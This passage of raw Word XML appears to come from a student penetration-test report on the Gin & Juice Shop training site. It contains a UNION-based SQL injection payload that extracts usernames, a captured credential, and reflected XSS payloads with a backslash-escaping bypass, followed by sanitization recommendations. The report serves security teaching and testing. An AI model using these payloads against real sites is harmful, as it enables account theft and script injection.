        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6F24">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UNION SELECT NULL,NULL,username,NULL,NULL,NULL,NULL,NULL FROM PUBLIC.USERS</w:t>
      </w:r>
      <w:r w:rsidR="0075418C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00781175" w:rsidRDefault="0075418C" w:rsidP="00781175">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">As it showen his name is </w:t>
      </w:r>
      <w:r w:rsidRPr="0075418C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Carlos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00781175" w:rsidRDefault="00781175" w:rsidP="00781175">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6800850" cy="42868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s - Gin &amp; Juice Shop — Mozilla Firefox 10_23_2024 10_28_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05437" cy="4289752"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00781175" w:rsidRDefault="00781175" w:rsidP="00781175">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00781175" w:rsidRDefault="00781175">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C700EC" w:rsidRDefault="005E1273" w:rsidP="00C700EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">also we catch his </w:t>
      </w:r>
      <w:r w:rsidRPr="005E1273">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C700EC">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> hunter2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="00C700EC" w:rsidP="00522CC0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6834627" cy="49212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cts - Gin &amp; Juice Shop — Mozilla Firefox 10_23_2024 11_17_18 PM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858149" cy="4938187"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00522CC0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C700EC" w:rsidRDefault="00C700EC" w:rsidP="00522CC0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C700EC" w:rsidRDefault="00C700EC" w:rsidP="00522CC0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C700EC" w:rsidRDefault="00C700EC" w:rsidP="00522CC0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C700EC" w:rsidRDefault="00C700EC" w:rsidP="00522CC0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C700EC" w:rsidRDefault="00C700EC" w:rsidP="00522CC0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRPr="00522CC0" w:rsidRDefault="005424C1" w:rsidP="00C700EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00522CC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00C700EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRPr="0012248B" w:rsidRDefault="005424C1" w:rsidP="0012248B"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="1777"/>
        <w:tblW w:w="9409" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9409"/>
      </w:tblGrid>
      <w:tr w:rsidR="005424C1" w:rsidRPr="00522CC0" w:rsidTr="008F47C0">
        <w:trPr>
          <w:trHeight w:val="341"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9409" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005424C1" w:rsidRPr="00522CC0" w:rsidRDefault="005424C1" w:rsidP="00522CC0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00522CC0">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Cross-Site Scripting: reflected</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005424C1" w:rsidRPr="00522CC0" w:rsidRDefault="005424C1" w:rsidP="008F47C0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="2183"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4675"/>
        <w:gridCol w:w="4675"/>
      </w:tblGrid>
      <w:tr w:rsidR="005424C1" w:rsidRPr="00522CC0" w:rsidTr="008F47C0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005424C1" w:rsidRPr="00522CC0" w:rsidRDefault="005424C1" w:rsidP="008F47C0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00522CC0">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005424C1" w:rsidRPr="00522CC0" w:rsidRDefault="005424C1" w:rsidP="008F47C0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00522CC0">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Probability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005424C1" w:rsidRPr="00522CC0" w:rsidTr="008F47C0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005424C1" w:rsidRPr="00522CC0" w:rsidRDefault="005424C1" w:rsidP="008F47C0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D32292">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005424C1" w:rsidRPr="00522CC0" w:rsidRDefault="005424C1" w:rsidP="008F47C0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D32292">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00522CC0"/>
    <w:p w:rsidR="005424C1" w:rsidRPr="0012248B" w:rsidRDefault="005424C1" w:rsidP="00522CC0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1545"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="0012248B"/>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="0012248B"/>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="0012248B"/>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="0012248B"/>
    <w:p w:rsidR="005424C1" w:rsidRPr="0012248B" w:rsidRDefault="005424C1" w:rsidP="0012248B"/>
    <w:p w:rsidR="005424C1" w:rsidRPr="00BC2A0D" w:rsidRDefault="005424C1" w:rsidP="00522CC0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2A0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00D32292">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2A0D">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>In the path : ginandjuice.shop/catalog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRPr="00BC2A0D" w:rsidRDefault="005424C1" w:rsidP="00D32292">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRPr="00BC2A0D" w:rsidRDefault="005424C1" w:rsidP="00905DF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2A0D">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>when submitting “  2';alert(1)//   “ In the search box,  the application's response was returned as “ 2\';alert(1)//' ”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00905DF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRPr="00905DF4" w:rsidRDefault="005424C1" w:rsidP="002A4D6E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57C25266" wp14:editId="52AEDCE7">
            <wp:extent cx="5943600" cy="3438525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2053752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2902"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5424C1" w:rsidRDefault="005424C1" w:rsidP="002A4D6E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="002A4D6E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="002A4D6E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="002A4D6E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="002A4D6E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">so the application add a backslash character before any </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D6E">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>quotation mark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D6E">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the input to prevent the effect of quotation mark .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00BC2A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> but when </w:t>
      </w:r>
      <w:r w:rsidRPr="0019652A">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>submitting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> “ 2\</w:t>
      </w:r>
      <w:r w:rsidRPr="0019652A">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>';alert(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">// ”   in the search box , </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D6E">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>the application fails to escape any backslash characters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the input ,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC2A0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC2A0D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>and the quotation mark remains unescaped and succeeds in terminating the string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00BC2A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00BC2A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00BC2A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00BC2A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00BC2A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00BC2A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27F7D9E5" wp14:editId="646850E6">
            <wp:extent cx="5934075" cy="3248025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="408076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5424C1" w:rsidRDefault="005424C1" w:rsidP="002A4D6E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F11FEE" wp14:editId="0D9EFFFB">
            <wp:extent cx="5943600" cy="2838450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1720139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5424C1" w:rsidRDefault="005424C1" w:rsidP="00BC2A0D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2A0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00470FF7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00470FF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">  Input should be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00470FF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>properly validated. For example, restrict inputs to expected formats and lengths.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00470FF7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRPr="00470FF7" w:rsidRDefault="005424C1" w:rsidP="00470FF7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRDefault="005424C1" w:rsidP="00470FF7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00470FF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">  Sanitize inputs by removing or encoding characters that could be harmful, such as quotes, backslashes, and angle brackets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005424C1" w:rsidRPr="00470FF7" w:rsidRDefault="005424C1" w:rsidP="00470FF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E1273" w:rsidRDefault="005E1273" w:rsidP="00781175">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E1273" w:rsidRDefault="005E1273" w:rsidP="00781175">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E1273" w:rsidRDefault="005E1273" w:rsidP="00781175">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="005E1273" w:rsidRDefault="005E1273" w:rsidP="00781175">
